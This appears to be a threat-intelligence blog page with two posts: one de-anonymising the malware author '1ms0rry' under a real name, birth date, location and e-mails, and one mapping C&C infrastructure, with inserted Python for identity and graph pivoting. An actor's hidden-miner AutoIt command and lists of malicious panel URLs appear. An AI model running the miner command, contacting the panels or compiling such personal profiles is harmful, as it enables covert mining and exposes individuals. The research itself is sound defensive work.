<li><a href="http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04">http://telegra.ph/Pishem-DDOS-bota-na-C-CHast-1-02-04</a></li>
<li><a href="http://telegra.ph/Analiz-stillera-ot-xZist-01-06">http://telegra.ph/Analiz-stillera-ot-xZist-01-06</a></li>
<li><a href="http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09">http://telegra.ph/Pishem-loader-s-avtoudaleniem-na-C-01-09</a></li>
<li><a href="http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22">http://telegra.ph/Analiz-majnera-ot-EgorSa1dy-02-22</a></li>
</ul>
</br></br>
<h4>Forks</h4>
Some fork examples:</br>
<ul>
<li>FelixHTTP (N0f1l3 fork):</br>
Ref: <a href="https://twitter.com/siri_urz/status/974205197407932416">https://twitter.com/siri_urz/status/974205197407932416</a></br>
40089ea9af2c1191fd9dfec5c49d1c37809b9eae8609bcaa810346e81ca3384a</br>
freexmr.ru</br></br>
<center><a href="https://i.imgur.com/NJtXnBn.jpg"><img src="https://i.imgur.com/NJtXnBn.jpg" height=500px /></a></center><br>
<center><a href="https://i.imgur.com/PWymTDY.jpg"><img src="https://i.imgur.com/PWymTDY.jpg" height=500px/></a></center><br>
</li>
<li>BUMBLEBEE MinerPanel:</br>
Ref: <a href="https://twitter.com/malwrhunterteam/status/956155159469608960">https://twitter.com/malwrhunterteam/status/956155159469608960</a></br>
ih803741.myihor.ru</br></br>
<center><a href="https://i.imgur.com/DVpOqq3.jpg"><img src="https://i.imgur.com/DVpOqq3.jpg" height=500px/></a></center><br>
<center><a href="https://i.imgur.com/yCXVQOb.jpg"><img src="https://i.imgur.com/yCXVQOb.jpg" height=500px/></a></center><br>
<center><a href="https://i.imgur.com/WVXdSnb.jpg"><img src="https://i.imgur.com/WVXdSnb.jpg" height=500px/></a></center><br>
</li>
<li>EnlightenedHTTP:</br>
Ref: <a href="https://twitter.com/ViriBack/status/962051515526520832">https://twitter.com/ViriBack/status/962051515526520832</a></br>
179.43.147.227/mine/</br>
v90327ux.beget.tech</br>
1754d64016c758a65cb85df328ffd502a7255a6855d976e3bdeb497f95201848</br>
<center><a href="https://i.imgur.com/qUKNU5s.jpg"><img src="https://i.imgur.com/qUKNU5s.jpg" height=500px /></a></center><br>
</li>
<li>Evrial:</br>
Evrial (<a href="https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/">https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/</a>) uses code from 1ms0rry for sure:</br>
<center><a href="https://i.imgur.com/Sd0PU23.png"><img src="https://i.imgur.com/Sd0PU23.png" height=700px/></a></center>
</li>
</ul>
</br>
<h2>Who is 1MS0RRY ? </h2>
Now let's try to understand who is 1ms0rry.</br>
We know that he has:
<ul>
<li>a Twitter account: <a href="https://twitter.com/ims0rry_off">https://twitter.com/ims0rry_off</a></br>
<center><a href="https://twitter.com/ims0rry_off/status/978657619790499840"><img src="https://i.imgur.com/fct7uZZ.png" height=650px/></a></center></li>
<li>a Telegram account: <a href="https://t.me/ims0rryblog">https://t.me/ims0rryblog</a></br>
<center><img src="https://i.imgur.com/YuGH4Ac.png"/></center></li>
<li>a GitHub account: <a href="https://github.com/ims0rry/">https://github.com/ims0rry/</a></br>
<center><a href="https://twitter.com/ims0rry_off/status/960872074502918145"><img src="https://i.imgur.com/S0FFQHL.png" /></a></center></li>
</ul>
Let's try to get the nicknames and e-mail addresses used to commit to this GitHub account.</br></br>
The commit history gives us (full details in the annex section):
<ul>
<li>gornostay322@mail.ru</li>
<li>lordatsa@mail.ru</li>
<li>your_email@whatever.com</li>
</ul>
with the nicknames:
<ul>
<li>Gatsoev</li>
<li>hype</li>
<li>ims0rry</li>
<li>s0rry</li>
<li>Your Name</li>
</ul>
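Added example (my own code, not from the original post): the identity-collection step above, done over the plain output of <code>git log</code> for a cloned repository. The sample log and the identities in it are constructed placeholders, not the actor's real commits; the grouping logic surfaces a nickname reused with several e-mail addresses, or an address reused under several nicknames, which is the kind of overlap the rest of this section pivots on.

```python
# Added example: collect (name, e-mail) pairs from `git log` output and group
# them so that reused nicknames / addresses stand out. The sample log is
# constructed with placeholder identities.
import re
from collections import Counter

# Matches the "Author: Name <email>" line of the default `git log` format
AUTHOR_RE = re.compile(r"^Author:\s*(?P<name>.*?)\s*<(?P<email>[^>]*)>\s*$")

# Constructed `git log` output; commit ids and identities are placeholders
SAMPLE_GIT_LOG = """\
commit 0000000000000000000000000000000000000001
Author: Alice Example <alice@example.com>
Date:   Mon Jan 1 10:00:00 2018 +0300

    initial commit

commit 0000000000000000000000000000000000000002
Author: al1ce <alice@example.com>
Date:   Tue Jan 2 11:00:00 2018 +0300

    add builder

commit 0000000000000000000000000000000000000003
Author: Your Name <your_email@whatever.com>
Date:   Wed Jan 3 12:00:00 2018 +0300

    oops, wrong identity

commit 0000000000000000000000000000000000000004
Author: al1ce <alice.work@example.org>
Date:   Thu Jan 4 13:00:00 2018 +0300

    fix panel
"""

# Identities that git tutorials and unconfigured clients leave behind; they
# carry no attribution value and are dropped when pivoting
PLACEHOLDER_IDENTITIES = {
    ("Your Name", "your_email@whatever.com"),
    ("Your Name", "you@example.com"),
}


def commit_identities(log_text):
    """Return a Counter of (name, email) pairs found in Author: lines."""
    counts = Counter()
    for line in log_text.splitlines():
        m = AUTHOR_RE.match(line)
        if m:
            counts[(m.group("name"), m.group("email"))] += 1
    return counts


def pivot_points(log_text):
    """Group identities two ways: e-mails per nickname and nicknames per
    e-mail. Placeholder identities are dropped. Returns a pair of dicts with
    sorted lists as values."""
    emails_by_name, names_by_email = {}, {}
    for (name, email) in commit_identities(log_text):
        if (name, email) in PLACEHOLDER_IDENTITIES:
            continue
        emails_by_name.setdefault(name, set()).add(email)
        names_by_email.setdefault(email, set()).add(name)
    return (
        {n: sorted(v) for n, v in emails_by_name.items()},
        {e: sorted(v) for e, v in names_by_email.items()},
    )


if __name__ == "__main__":
    # Real use: feed it the output of `git log` run in the cloned repository
    for ident, n in commit_identities(SAMPLE_GIT_LOG).most_common():
        print(n, ident)
    by_name, by_email = pivot_points(SAMPLE_GIT_LOG)
    print("e-mails per nickname:", by_name)
    print("nicknames per e-mail:", by_email)
```

On the constructed sample, the address alice@example.com links "Alice Example" to "al1ce", and "al1ce" in turn links to a second address: two hops of exactly the kind that connect the handles and mailboxes listed above.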
lordatsa@mail.ru gives us a mail.ru account: <a href="https://my.mail.ru/mail/lordatsa/photo">https://my.mail.ru/mail/lordatsa/photo</a></br>
<center><a href="https://i.imgur.com/NyzRQBs.png"><img src="https://i.imgur.com/NyzRQBs.png" height=400px /></a></center></br>
We now have a name: Аца Гацоев (Atsa Gatsoev)
</br>
All this information helps us find this Weblancer profile: <a href="https://www.weblancer.net/users/hypega">https://www.weblancer.net/users/hypega</a></br>
<center><a href="https://i.imgur.com/lr480wC.png"><img src="https://i.imgur.com/lr480wC.png" height=400px /></a></center></br>
This profile is interesting because:
<ul>
<li>the name Ацамаз Гацоев (Atsamaz Gatsoev) is the same as on the mail.ru account</li>
<li>the username is hypega; hype was used to commit on GitHub, and hypega stands for "hypeGatsoev"</li>
<li>the personal website in the profile information is <a href="http://lordatsa.wix.com/gatsoevsummary">http://lordatsa.wix.com/gatsoevsummary</a>; lordatsa is the username used for mail.ru</li>
</ul>
<a href="http://lordatsa.wix.com/gatsoevsummary">http://lordatsa.wix.com/gatsoevsummary</a> is also interesting:</br>
<center><a href="https://i.imgur.com/FRK5V9h.png"><img src="https://i.imgur.com/FRK5V9h.png" height=400px /></a></center></br>
<ul>
<li>VK Account: <a href="https://vk.com/quiet_and_invisible">https://vk.com/quiet_and_invisible</a></li>
<li>G+ account: <a href="https://plus.google.com/u/0/109976643017066209762/">https://plus.google.com/u/0/109976643017066209762/posts/p/pub</a></li>
</ul>
The VK account looks down, but the photos in the G+ account point to 1ms0rry again:
<center><a href="https://i.imgur.com/bVIxKDp.png"><img src="https://i.imgur.com/bVIxKDp.png"></a></center></br>
The G+ account allows us to switch to the related Youtube account:</br>
<center><a href="https://i.imgur.com/GvfCTRa.png"><img src="https://i.imgur.com/GvfCTRa.png" height=400px /></a></center></br>
Now, take a deeper look at this video <a href="https://youtu.be/zPRo3hkVbrQ?t=4">https://youtu.be/zPRo3hkVbrQ?t=4</a> </br>
<center><a href="https://i.imgur.com/aSCCZoV.jpg"><img src="https://i.imgur.com/aSCCZoV.jpg" height=400px /></a></center></br>
This directory, [NEW] builder on the desktop, reminds us of the LoaderBot PDB path:</br>
<code>c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb</code> </br>
</br>
In <a href="https://youtu.be/KUvLk20-NZk?t=6">https://youtu.be/KUvLk20-NZk?t=6</a> at 6 seconds we can see Themida and a local path C:\Users\gorno</br>
<center><a href="https://i.imgur.com/oTxOvCQ.png"><img src="https://i.imgur.com/oTxOvCQ.png" height=400px/></a></center></br>
In <a href="https://www.youtube.com/watch?v=KUvLk20-NZk">https://www.youtube.com/watch?v=KUvLk20-NZk</a> at 1 second we can see the viruscheckmate user, which is hypega (again)
<center><a href="https://i.imgur.com/sWs3z7M.png"><img src="https://i.imgur.com/sWs3z7M.png" height=250px/></a></center>
His freelancer account is interesting too, <a href="https://freelance.ru/hypega">https://freelance.ru/hypega</a>.</br>
It allows us to retrieve 2 links:
</br>
* A Portfolio website: <a href="http://lordatsa.wix.com/e-consultant">lordatsa.wix.com/e-consultant</a> (via <a href="https://freelance.ru/hypega/elektronny-konsultant-2810410.html">https://freelance.ru/hypega/elektronny-konsultant-2810410.html</a>)
</br>
* A GitHub account: <a href="https://github.com/Gatsoev/Nerve_MobileApp">github.com/Gatsoev/Nerve_MobileApp</a> (via <a href="https://freelance.ru/hypega/pr-agent-2966193.html">https://freelance.ru/hypega/pr-agent-2966193.html</a>)
</br>
This GitHub account is a perfect proof. </br>
Let's take a look at, for example, <a href="https://github.com/Gatsoev/csgo.tm-fakeSellExtension">https://github.com/Gatsoev/csgo.tm-fakeSellExtension</a>.</br>
<center><img src="https://i.imgur.com/bPOF7vU.png"></center>
</br>
Curious, isn't it? It looks like the GitHub account was just renamed.
</br>
We now have enough proof to link 1ms0rry to Ацамаз Гацоев / Atsamaz Gatsoev.</br></br>
Who the hell is Atsamaz Gatsoev?
We can find a potential picture of him in his <a href="https://www.weblancer.net/users/hypega">weblancer profile</a>: </br>
<center><a href="https://i.imgur.com/fjWDYee.png"><img src="https://i.imgur.com/fjWDYee.png" height=400px/></a></center></br></br>
Confirmed by Alan Salbiev from the Education Ministry in a <a href="https://www.facebook.com/alansalbiev/posts/1663614260360099">Facebook post</a>.</br>
Alan Salbiev describes 1ms0rry like this:</br>
<center><a href="https://i.imgur.com/ObDsPFt.png"><img src="https://i.imgur.com/ObDsPFt.png" height=500px></a></center></br>
Google translate:</br>
<pre>
Atsamaz Gatsoev.
11th-grade student from Vladikavkaz.
He ran and published in his blog theme more than 20 research papers in the field of information security, in particular, virology,
namely: analysis of protection and opening of various malicious software, methods of cyber attacks and protecting against them.
Over 1,400 people signed it.
December 2-3, 2017 in Vladikavkaz was held the first hackathon among high school students for the prize of the Head of the Republic
in which Atsamaz acted as a mentor.
Atsamaz he organized and conducted twice a thematic Olympiad on CTF (Capture the flag) of information security in the format Task-based,
which was attended by over 100 people from different cities and countries.
In addition, with the direct participation Atsamaz (design, commissioning and start-up) in the work of our Office has been implemented
application based on the principles of distributed data registry (blockchain - technology)
February 25, 2018 at competitions on sports hacking at the University ITMO our hero confidently walked rivals from Komsomolsk-on-Amur,
Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersburg.
At Atsamaz there is a dream - to enter the University of ITMO. Our Office will provide every possible assistance to a talented guy.
Special mention should be noted that the successes Atsamaz lies the great work of his parents, who were able to instill in him the
awareness, independence, the desire for knowledge and hard work. Take an example from them.
</pre>
</br>
It's easy to protect against malware when you develop it, isn't it?</br>
TL;DR:</br>
(We only keep information related to his malware activities.)</br>
</br>
Name: Ацамаз Гацоев, Atsamaz Gatsoev</br>
Born: 1997 Aug. 14</br>
Location: Tskhinvali region</br>
Nicknames: 1ms0rry, gorno, hypega, Gatsoev, lordatsa, atsam</br>
Email: lordatsa@mail.ru gornostay322@mail.ru</br>
Social: https://vk.com/quiet_and_invisible https://twitter.com/ims0rry_off https://github.com/ims0rry/ https://plus.google.com/u/0/109976643017066209762/
</br>
There is enough information to know exactly who 1ms0rry is :)</br></br>
<h2>Conclusion</h2>
Obviously, this write-up doesn't cover every malware (you can find some telegra.ph bot too), but it's enough data if somebody needs to go deeper.
</br>
<center><img src="https://i.imgur.com/Pcv65cs.gif"/></center>
</br>
This is not a major threat actor: the malware he developed is not really advanced and the web panels are basic (except the design!), but the SorryCoin backend was interesting.
</br>
It is obvious here that Ацамаз Гацоев is a malware developer/reseller and not a researcher or a red-teamer who develops malware for PoC purposes.
</br>
Just in case, we archived all the links (forum, twitter, telegraph...) on archive.org :).
</br>
That's all, folks! </br>
We hope you enjoyed the read; if you need more information, don't hesitate to ping us.</br>
Thanks again to MalwareMustDie and sS.! for the awesome work, and greetz to NibbleHunter.</br></br>
<h3>Related works</h3>
<a href="https://go.recordedfuture.com/hubfs/reports/cta-2017-1011.pdf">https://go.recordedfuture.com/hubfs/reports/cta-2017-1011.pdf</a></br>
<a href="https://0btemos.blogspot.dk/2018/02/analyzed-bot-1ms0rry.html">https://0btemos.blogspot.dk/2018/02/analyzed-bot-1ms0rry.html</a></br>
</br>
<h3>Annexe</h3>
<h4>Github Information</h4>
<li>Commit nickname:email by repository</li>
<iframe src="https://pastebin.com/embed_iframe/pfmprDZg/noheader" style="border:none;width:100%"></iframe>
<li>lordatsa mail address:</li>
<pre>
Hawksh-miner/CPU PUBLIC/CommonRes/32_unpacked_.au3:
Run("Cheking.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u lordatsa@mail.ru" & $rand & " -p x " & $threads, "", @SW_HIDE)
</pre>
<li>Different user path found on the Github</li>
<iframe src="https://pastebin.com/embed_iframe/Bbuf9kLZ/noheader" style="border:none;width:100%"></iframe>
</br>
<li>1ms0rry posts</li>
<iframe src="https://pastebin.com/embed_iframe/a0YzQTwQ/noheader" style="border:none;width:100%"></iframe>
Benkow_, 2017-12-27: Another normal day in cybercrime: from a random Loki sample to 550 C&C</br>
Hi,</br>
</br>
These weeks, I wanted to spend time on Maltego to test this amazing tool, but for that I needed something to study.</br>
As usual in this case, I took a look at <a href="http://cybercrime-tracker.net" >CCT</a> for interesting stuff.</br>
<center><img src="https://i.imgur.com/ChB4DMa.png" /></center></br>
</br>
7 malicious domains on the same IP, 195.14.105.12. VirusTotal passive DNS reports 56 malicious domains: it looks perfect for Maltego.</br>
The game here is to collect as many linked C&Cs as possible via:
<ul>
<li>Passive DNS</li>
<li>Malware analysis</li>
<li>Registrant Emails reuse</li>
</ul>
And of course, without false positives or unrelated servers. I tried not to go earlier than 2016.</br>
</br>
I will show you in this blogpost how some random malware campaigns, like Pony or Loki, are in the end connected to each other. These are quick notes about a very big network.</br>
<center><iframe src="https://giphy.com/embed/atQBbRUX3JOGA" width="480" height="271" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
</br>
I've tried to do my best to collect as much info as possible, but I know that this blogpost covers only a little part of a really big infrastructure. I'm publishing it in case it is useful to somebody.</br>
<h1>Malware reminder</h1>
A quick reminder about the malware we will discuss in this article.
<ul>
<li>Pony - Password stealer <a href="http://www.xylibox.com/2013/05/pony-19-win32fareit.html">[1]</a> <a href="https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/">[2]</a> <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1558">[3]</a></li>
<li>Loki - Password stealer <a href="https://phishme.com/loki-bot-malware/">[1]</a> <a href="https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850">[2]</a></li>
<li>KeyBase - Password Stealer <a href="https://researchcenter.paloaltonetworks.com/2015/06/keybase-keylogger-malware-family-exposed/">[1]</a></li>
<li>AgentTesla - Password Stealer <a href="https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr">[1]</a></li>
<li>BetaBot - Multi purpose (DDoS, formgrabber, loader...) <a href="http://resources.infosecinstitute.com/beta-bot-analysis-part-1/">[1]</a> <a href="http://resources.infosecinstitute.com/beta-bot-analysis-part-2/">[2]</a> <a href="http://www.xylibox.com/2015/04/betabot-retrospective.html">[3]</a></li>
<li>Atmos - Banking trojan (Zeus fork) <a href="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-ice-419.pdf">[1]</a> <a href="http://blog.malwaremustdie.org/2016/06/mmd-0054-2016-atmos-botnet-and-facts.html">[2]</a> <a href="https://cybercrime-tracker.net/ccam.php">[3]</a></li>
<li>DiamondFox - Multi purpose (pwd stealer, POS, wallet stealer, loader...) <a href="https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/">[1]</a> <a href="https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/">[2]</a></li>
<li>JackPOS - Point of Sales <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/">[1]</a>
<a href="https://www.defcon.org/images/defcon-22/dc-22-presentations/McGrew/DEFCON-22-Wesley-McGrew-Instrumenting-Point-of-Sale-Malware-WP.pdf">[2]</a></li>
<li>LiteHTTP - Loader <a href="https://github.com/zettabithf/LiteHTTP">[1]</a></li>
<li>QuantLoader - Loader <a href="https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground">[1]</a></li>
<li>ZyklonHTTP - Multi purpose (DDoS, Loader, pwd stealer...) <a href="https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/zyklon-http-botnet/">[1]</a> <a href="http://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html">[2]</a></li>
</ul>
This is the typical <strike>asshole</strike> cybercrime starter kit. All these tools are open source or really easy to crack, and they are poorly detected by the antivirus industry.
</br>
<h1>Infrastructure</h1>
<center><img src="https://i.imgur.com/mRTjCri.png" /></center></br>
</br>
<center><iframe src="https://giphy.com/embed/3ohc0YyGLVb3lBjoSQ" width="480" height="242" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center>
<center><a href="http://benkow.cc/8287e89c7fb96aa02065b8fb0596795d01d959d6ae1f972db4188e52726aaaaa.mtgl">The Maltego base is available here</a></center>
Like every Maltego noob, I first used a lot of transforms on all the domains, but after some hours my graph was full of false positives. Some binaries contact whatsmyip, Gmail or Yahoo, some domains were legit in 2012 but not in 2016, etc.</br>
I erased all the data and started again from zero, but this time I spent time on each domain and IP to be sure not to include bullshit.</br>
After some hours of work, I obtained this topology.</br>
The little circle is composed of all the interconnected elements (IPs, domains, emails or hashes) and the biggest circle is composed of "final IOCs" (C&C URLs, hashes or emails).</br>
I have found:
<ul>
<li>116 IPs - <a href="https://pastebin.com/PtdQrZC8">Full list</a></li>
<li>485 domains - <a href="https://pastebin.com/pKwjFazb">Full list</a></li>
<li>53 Registrants emails - <a href="https://pastebin.com/PXzHNaSR">Full list</a></li>
<li>548 identified C&C (web panels) - (full list below)</li>
<li>160 Hashes</li>
</ul>
There are some nodes dedicated to phishing, others to malware spreading, others to malware C&C, etc.
</br>
The huge majority of IPs are located in RU as usual (keep in mind that RU IP != RU actors ;) )</br>
<center><img src="https://i.imgur.com/sURPuuk.png" height=600px/></center></br>
</br>
If we look at the top 5 most connected elements, we find:
<ul>
<li>42.112.16.179</li>
<li>91.224.23.174</li>
<li>46.173.219.193 </li>
<li>42.112.16.178 </li>
<li>hdfc.pp.ru </li>
</ul>
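To make the pivoting method concrete (passive DNS, malware analysis and registrant email reuse feeding one graph, the interconnected "little circle" versus the final IOCs, and the most connected elements), here is an added Python example. It is not the post's Maltego data and not Maltego code: every observation is constructed (RFC 5737 addresses, .example domains, a placeholder mailbox and placeholder hashes), and the helpers build_graph, components, hubs_and_leaves, most_connected and pivot_from are mine.</br>

```python
"""Pivot infrastructure observations into a graph and rank the hubs.

Added example, not the post's data. All observations below are constructed:
RFC 5737 addresses, .example domains, a placeholder e-mail and placeholder hashes.
"""
from collections import defaultdict

# One relation per source named in the post:
#   ("pdns",   ip,     domain): passive DNS saw domain resolve to ip
#   ("whois",  email,  domain): registrant e-mail on the domain's WHOIS record
#   ("sample", sha256, domain): a malware sample contacted the domain
OBSERVATIONS = [
    ("pdns", "192.0.2.10", "panel-a.example"),
    ("pdns", "192.0.2.10", "panel-b.example"),
    ("pdns", "192.0.2.10", "panel-e.example"),
    ("pdns", "192.0.2.11", "panel-b.example"),
    ("pdns", "192.0.2.11", "panel-c.example"),
    ("whois", "reg@example.net", "panel-a.example"),
    ("whois", "reg@example.net", "panel-d.example"),
    ("whois", "reg@example.net", "panel-e.example"),
    ("sample", "sha256:PLACEHOLDER-1", "panel-c.example"),
    ("sample", "sha256:PLACEHOLDER-2", "panel-d.example"),
    # An unrelated host that shares nothing with the cluster; it must stay isolated.
    ("pdns", "198.51.100.5", "unrelated.example"),
]


def build_graph(observations):
    """Undirected adjacency: every observation links its two entities both ways."""
    adj = defaultdict(set)
    for _kind, a, b in observations:
        adj[a].add(b)
        adj[b].add(a)
    return adj


def components(adj):
    """Connected components, each as a sorted list of nodes (one component = one infra cluster)."""
    seen, out = set(), []
    for start in adj:
        if start in seen:
            continue
        stack, comp = [start], set()
        while stack:
            node = stack.pop()
            if node in comp:
                continue
            comp.add(node)
            stack.extend(adj[node] - comp)
        seen |= comp
        out.append(sorted(comp))
    return out


def hubs_and_leaves(adj):
    """Split nodes like the post's graph: pivots (degree >= 2) vs final IOCs (degree 1)."""
    hubs = {n for n, nb in adj.items() if len(nb) >= 2}
    leaves = {n for n, nb in adj.items() if len(nb) == 1}
    return hubs, leaves


def most_connected(adj, n=5):
    """Top-n nodes by degree (ties broken alphabetically): the 'most connected elements'."""
    return sorted(adj, key=lambda x: (-len(adj[x]), x))[:n]


def pivot_from(adj, seed, max_hops=2):
    """Everything reachable from one seed within max_hops, mapped to its hop distance."""
    frontier, reached = {seed}, {seed: 0}
    for hop in range(1, max_hops + 1):
        frontier = {nb for node in frontier for nb in adj[node] if nb not in reached}
        for node in frontier:
            reached[node] = hop
    return reached


if __name__ == "__main__":
    graph = build_graph(OBSERVATIONS)
    for comp in components(graph):
        print(len(comp), "nodes:", comp)
    hubs, leaves = hubs_and_leaves(graph)
    print("hubs:", sorted(hubs))
    print("final IOCs:", sorted(leaves))
    print("most connected:", most_connected(graph, 3))
    print("2 hops from 192.0.2.10:", pivot_from(graph, "192.0.2.10"))
```

The isolated pair at the end is the point of the component step: a domain that shares no IP, registrant or sample with the cluster stays out, which is the false-positive control the post describes doing by hand. The hop limit in pivot_from is the other control; expanding everything indefinitely is how a graph fills up with whatsmyip and Gmail.</br>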
hdfc.pp.ru is a good domain for discovering a lot of other IPs. This domain pointed to 49 different IPs in 1 year. It was known for hosting C&Cs like Atmos, Pony or Lokibot. (<a href="https://twitter.com/Techhelplistcom/status/780893577157095424">[1]</a><a href="https://twitter.com/Antelox/status/811302669029670912">[2]</a>)</br>
</br>
Another interesting pivot: if you look at the domains connected to our initial IP (195.14.105.12), a domain, vividerenaz.com, was registered by abuse@domainprovider.work. This email is a valid email used by crooks mainly for spreading phishing, but some malware too. Techhelplist has reported a lot of IPs and domains related to <a href="https://twitter.com/Techhelplistcom/status/849980278806388737">this email</a></br>
</br>
I tried to find information on campaigns that used these domains. This is a quick list:
<ul>
<li><a href="https://isc.sans.edu/forums/diary/Email+attachment+using+CVE20178759+exploit+targets+Argentina/22850/">Email attachment using CVE-2017-8759 exploit targets Argentina</a></li>
<li><a href="http://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html">Threat Round-up for Mar 24 - Mar 31</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2016/07/13/index.html">2016-07-13 - NEUTRINO EK DATA DUMP WITH "JUICYLEMON" BANDARCHOR</a></li>
<li><a href="https://www.ransecurity.com/?p=1042">ATENCIÓN! Intento de estafa mediante un phishing AFIP (ARGENTINA)</a></li>
<li><a href="http://www.clearskysec.com/leetmx/">LeetMX – a Yearlong Cyber-Attack Campaign Against Targets in Latin America</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2017/06/12/index5.html">2017-06-12 - HANCITOR MALSPAM (DOCUSIGN-THEMED)</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2017/06/15/index2.html">2017-06-15 - HANCITOR MALSPAM (GOOGLE DOCS-THEMED)</a></li>
<li><a href="https://brica.de/alerts/alert/public/1170845/heads-up-lokibot-endpoints-loki-c2s/">Heads-Up - LokiBot Endpoints - loki c2s</a></li>
<li><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-11882-exploited-deliver-cracked-version-loki-infostealer/">CVE-2017-11882 Exploited to Deliver a Cracked Version of the Loki Infostealer</a></li>
<li><a href="https://securelist.com/neutrino-modification-for-pos-terminals/78839/">Neutrino modification for POS-terminals</a></li>
<li><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-stegbaus-because-sometimes-xor-just-isnt-enough/">StegBaus: Because Sometimes XOR Just Isn’t Enough</a></li>
<li><a href="http://www.malware-traffic-analysis.net/2017/04/05/index.html">2017-04-05 - TERROR EK SENDS ANDROMEDA</a></li>
<li><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-emea-bi-monthly-threat-reports-turkey-saudi-arabia-united-arab-emirates/">EMEA Bi-Monthly Threat Reports: Turkey, Saudi Arabia & United Arab Emirates</a></li>
<li><a href="https://www.zscaler.com/blogs/research/increase-jrat-campaigns">Increase in jRAT Campaigns</a></li>
</ul>
It looks like there are many actors using these domains, from the Hancitor gang to Nigerian scammers. It is possible that this infrastructure is rented somewhere in a market.</br>
</br>
<h1>Malware</h1>
Here we go for the panel list.</br>
I only kept the most common families; you can find the full details in the Maltego base.
<h2>Pony</h2>
<iframe src="https://pastebin.com/embed_iframe/8Pw0S52k" style="border:none;width:100%"></iframe>
<h2>LokiBot</h2>
<iframe src="https://pastebin.com/embed_iframe/aeVTMfxn" style="border:none;width:100%"></iframe>
<h2>Atmos</h2>
<iframe src="https://pastebin.com/embed_iframe/zLkTSmsX" style="border:none;width:100%"></iframe>
<h2>BetaBot</h2>
<iframe src="https://pastebin.com/embed_iframe/kyam1t6c" style="border:none;width:100%"></iframe>
<h2>KeyBase</h2>
<iframe src="https://pastebin.com/embed_iframe/6e4y841k" style="border:none;width:100%"></iframe>
<h2>AgentTesla</h2>
<iframe src="https://pastebin.com/embed_iframe/cx1sKcMw" style="border:none;width:100%"></iframe>
<h2>DiamondFox</h2>
<iframe src="https://pastebin.com/embed_iframe/d1P2N3Nb" style="border:none;width:100%"></iframe>
<h2>ZyklonHTTP</h2>
<iframe src="https://pastebin.com/embed_iframe/Vt1gUnQv" style="border:none;width:100%"></iframe>
In the Maltego database you can also find some JackPOS, Neutrino, QuantLoader, BTC miner, LiteHTTP, Java RAT...</br>
With all these data, I tried to identify groups by URL patterns. I used the dirty way: I converted the URL list to CSV (by replacing / with ;) and sorted the result by directory.</br>
</br>
For example, this actor seems to be in the password stealing business. Pony and Loki are a close couple in many campaigns.</br>
<pre>
Loki,http://street-upp.ru/v1/fre.php
Pony,http://street-upp.ru/v6/gate.php
Pony,http://street-upp.ru/v7/gate.php
Pony,http://street-mens.ru/v1/gate.php
Pony,http://street-mens.ru/v2/gate.php
Loki,http://street-takeover.ru/okeagwu/fre.php
Pony,http://street-takeover.ru/v1/admin.php
Loki,http://street-wise.ru/v2/fre.php
Loki,http://street-wise.ru/v3/fre.php
Loki,http://street-wise.ru/v4/fre.php
Loki,http://street-wise.ru/v5/fre.php
Loki,http://street-wise.ru/v6/fre.php
Loki,http://street-ups.ru/v3/fre.php
Pony,http://street-ups.ru/v2/admin.php
Loki,http://street-men.ru/v3/fre.php
Loki,http://street-men.ru/v4/fre.php
Pony,http://street-men.ru/mmb/gate.php
Pony,http://street-men.ru/vpoli/gate.php
Loki,http://fyzeeconnect.ru/hthththththththht/Panel/five/fre.php
Loki,http://fyzeeconnect.ru/kingofkings/Panel/five/fre.php
Loki,http://fyzeeconnect.ru/my-friend/fre.php
Loki,http://fyzeeconnect.ru/street-credibilty/fre.php
Loki,http://fyzeeconnect.ru/street-takeover/fre.php
Loki,http://fyzeeconnect.ru/street-wise/fre.php
Pony,http://fyzeeconnect.ru/debbyrisingsun/gate.php
Pony,http://fyzeeconnect.ru/maliki/gate.php
Pony,http://fyzeeconnect.ru/v5/gate.php
</pre>
</br>
Another actor targeting Argentina with BetaBot and Atmos:
<pre>
BetaBot,http://av.bitdefenderesupdate.ru/.av/logout.php
Atmos,http://chester.agenteinformaticos.ru/.scnerio/chusma/tetris.php?m=login
Unknown,http://update.agenteinformaticos.ru/.coma/update/panel
</pre>
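The "dirty way" grouping described above (split the URL on / and sort by directory) done in Python, as an added example that is not part of the post. The sample rows are a subset of the panel lists above; the helpers parse_rows, registrable_domain, group_by_domain, families_per_domain and versioned_dir_pattern are mine, and the eTLD+1 logic is a deliberate two-label shortcut.</br>

```python
"""Group 'family,url' panel rows by host and directory to spot one actor's habits.

Added example; the rows are a subset of the panel lists in the post.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE_ROWS = """\
Loki,http://street-upp.ru/v1/fre.php
Pony,http://street-upp.ru/v6/gate.php
Pony,http://street-upp.ru/v7/gate.php
Loki,http://street-wise.ru/v2/fre.php
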